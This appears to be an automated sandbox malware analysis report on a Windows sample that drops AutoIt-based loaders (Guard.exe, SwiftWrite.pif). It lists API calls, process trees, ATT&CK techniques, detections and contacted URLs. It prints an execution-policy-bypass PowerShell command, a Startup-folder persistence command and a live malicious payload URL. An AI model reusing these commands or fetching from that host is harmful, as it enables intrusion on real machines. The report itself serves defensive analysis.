Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439AA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,1_2_00007FF6439AA350
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439AA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00007FF6439AA874
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643962F50 FindFirstFileExW,1_2_00007FF643962F50
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,1_2_00007FF6439A72A8
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A71F4 FindFirstFileW,FindClose,1_2_00007FF6439A71F4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00007FF64399B7C0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00007FF64399BC70
Source: C:\Users\Public\Guard.exeCode function: 11_2_00154005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00154005
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0015494A
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0015C2FF
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015CD14 FindFirstFileW,FindClose,11_2_0015CD14
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0015CD9F
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0015F5D8
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0015F735
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0015FA36
Source: C:\Users\Public\Guard.exeCode function: 11_2_00153CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00153CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C44005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00C44005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4494A GetFileAttributesW,FindFirstFileW,FindClose,17_2_00C4494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_00C4C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,17_2_00C4CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4CD14 FindFirstFileW,FindClose,17_2_00C4CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00C4F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00C4F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_00C4FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C43CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00C43CE2
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643941D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,1_2_00007FF643941D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: svchost.exe, 00000013.00000002.3434422171.000001B7CC854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3432950438.000001B7C722B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000008.00000002.2359340437.0000022C76D02000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.0000000004198000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 00000011.00000002.3435466038.0000000003D1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B0A00 BlockInput,1_2_00007FF6439B0A00
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439237B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00007FF6439237B0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643945BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,1_2_00007FF643945BC0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643926D1C LoadLibraryA,GetProcAddress,1_2_00007FF643926D1C
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643964318 GetProcessHeap,1_2_00007FF643964318
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643968FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF643968FE4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64395AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF64395AF58
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439457E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6439457E4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439459C8 SetUnhandledExceptionFilter,1_2_00007FF6439459C8
Source: C:\Users\Public\Guard.exeCode function: 11_2_0011A354 SetUnhandledExceptionFilter,11_2_0011A354
Source: C:\Users\Public\Guard.exeCode function: 11_2_0011A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0011A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C0A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00C0A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C0A354 SetUnhandledExceptionFilter,17_2_00C0A354

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\PPbimZI4LV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64398CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00007FF64398CE68
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439237B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00007FF6439237B0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643944514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00007FF643944514
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B2464 mouse_event,1_2_00007FF6439B2464
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"Jump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exitJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64398C858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_00007FF64398C858
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64398D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_00007FF64398D540
Source: PPbimZI4LV.exe, SwiftWrite.pif.11.dr, Guard.exe.3.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PPbimZI4LV.exe, Guard.exe, SwiftWrite.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64395FD20 cpuid 1_2_00007FF64395FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A8BF4 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,wcscat,wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,wcscpy,1_2_00007FF6439A8BF4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643982BCF GetUserNameW,1_2_00007FF643982BCF
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643962400 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_00007FF643962400
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643941D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,1_2_00007FF643941D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: powershell.exe, 00000008.00000002.2359340437.0000022C76D62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\Public\Guard.exe
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5EAD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Users\Public\Guard.exe
Source: Guard.exe, 0000000B.00000002.3432483129.00000000014B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume3\Users\Public\Guard.exe
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5EAD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Public\Guard.exe
Source: powershell.exe, 00000008.00000002.2359340437.0000022C76D42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2357524961.0000022C76BA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2357524961.0000022C76B80000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000003.2316221194.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000000B.00000003.2329295829.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000000B.00000003.2316384919.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000000B.00000003.2339893183.0000000004C51000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000003.2332901079.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000000B.00000003.2329408446.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000000B.00000003.2324915242.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000000B.00000003.2331466897.0000000004D50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Guard.exe
Source: powershell.exe, 00000008.00000002.2357524961.0000022C76AE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2C:\Users\Public\Guard.exe
Source: PPbimZI4LV.exe, 00000001.00000002.2264320173.0000019B59E88000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2357524961.0000022C76AE4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2316243026.0000022C5E8F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2359340437.0000022C76D02000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2357524961.0000022C76B47000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2357524961.0000022C76B20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2359340437.0000022C76D62000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2316243026.0000022C5EAD8000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, Guard.exe, 0000000B.00000002.3432057065.00000000011BE000.00000004.00000010.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3432057065.00000000011CE000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5EAD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Users\Public\Guard.exe
Source: SwiftWrite.pifBinary or memory string: WIN_81
Source: SwiftWrite.pifBinary or memory string: WIN_XP
Source: SwiftWrite.pifBinary or memory string: WIN_XPe
Source: SwiftWrite.pifBinary or memory string: WIN_VISTA
Source: PPbimZI4LV.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pifBinary or memory string: WIN_7
Source: SwiftWrite.pifBinary or memory string: WIN_8
Source: Guard.exe.3.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,1_2_00007FF6439B3940
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00007FF6439B4074
Source: C:\Users\Public\Guard.exeCode function: 11_2_0016696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_0016696E
Source: C:\Users\Public\Guard.exeCode function: 11_2_00166E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00166E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C5696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,17_2_00C5696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C56E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,17_2_00C56E32
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 2 Native API | 1 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 21 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 36 System Information Discovery | Distributed Component Object Model | Input Capture | 22 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 321 Masquerading | LSA Secrets | 51 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph. ID: 1577201, Sample: PPbimZI4LV.exe, Startdate: 18/12/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
PPbimZI4LV.exe | 28% | Virustotal | | Browse
PPbimZI4LV.exe | 42% | ReversingLabs | Win64.Adware.RedCap |

Source | Detection | Scanner | Label | Link
C:\Users\Public\Guard.exe | 8% | ReversingLabs | |
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | 8% | ReversingLabs | |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://139.99.188.124/xvDYouPUJ | 0% | Avira URL Cloud | safe |
http://139.99.188.124/BlQMSgJx.txt | 100% | Avira URL Cloud | malware |
http://139.99.188.124 | 0% | Avira URL Cloud | safe |
http://139.99.H | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.58.100 | true | false | | high
ax-0001.ax-msedge.net | 150.171.28.10 | true | false | | high
nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://139.99.188.124/xvDYouPUJ | true | Avira URL Cloud: safe | unknown
http://139.99.188.124/BlQMSgJx.txt | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000000.2314147832.00000000001B9000.00000002.00000001.01000000.00000007.sdmp, SwiftWrite.pif, 00000011.00000000.2473325252.0000000000CA9000.00000002.00000001.01000000.00000009.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.dr | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.2316243026.0000022C5FFD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000008.00000002.2316243026.0000022C5FD26000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/Prod1C: | qmgr.db.19.dr | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.2316243026.0000022C5FF4B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://139.99.188.124 | powershell.exe, 00000008.00000002.2316243026.0000022C5E8F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2316243026.0000022C5F817000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://crl.microsoft | powershell.exe, 00000008.00000002.2315969638.0000022C5CD25000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.2316243026.0000022C5FF4B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000008.00000002.2316243026.0000022C5F817000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.2316243026.0000022C5FFD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://oneget.orgX | powershell.exe, 00000008.00000002.2316243026.0000022C5FD26000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 00000013.00000003.2586107230.000001B7CC740000.00000004.00000800.00020000.00000000.sdmp, edb.log.19.dr | false | | high
http://crl.ver) | svchost.exe, 00000013.00000002.3434288775.000001B7CC800000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000008.00000002.2316243026.0000022C5E6D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                        http://139.99.Hpowershell.exe, 00000008.00000002.2316243026.0000022C5FCF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.autoitscript.com/autoit3/Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.2316243026.0000022C5E6D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2316243026.0000022C5FF4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
